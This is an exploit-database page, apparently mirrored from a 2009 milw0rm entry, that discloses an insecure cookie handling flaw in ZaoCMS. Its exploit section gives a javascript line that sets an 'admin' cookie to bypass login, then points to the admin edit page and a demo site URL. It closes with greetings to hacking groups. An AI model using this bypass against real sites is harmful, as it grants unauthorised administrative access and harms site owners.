[] NeoSense
E X P L O I T S
title author type platform port cve id

ZaoCMS - Insecure Cookie Handling

Author: ThE g0bL!N
type: webapps
platform: php
port: 
date_added: 2009-05-20 
date_updated:  
verified: 1 
codes: OSVDB-54638 
tags: 
aliases:  
screenshot_url:  
application_url: 
--------------------------------------------------------------
ZaoCMS Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.zaocms.com/
Software : ZaoCMS
---------------------------------------------------------------
Exploit:
---------
admin/login.php
javascript:document.cookie="admin=stgAdmin;path=/";
Then Go To
admin/edit.php
demo:
-------
http://demo.zaocms.com/admin/login.php
-----------------------------------------------------------------------------------------------------
His0k4  - Dr-HTmL , Dos-Dz TeaM , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-21]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.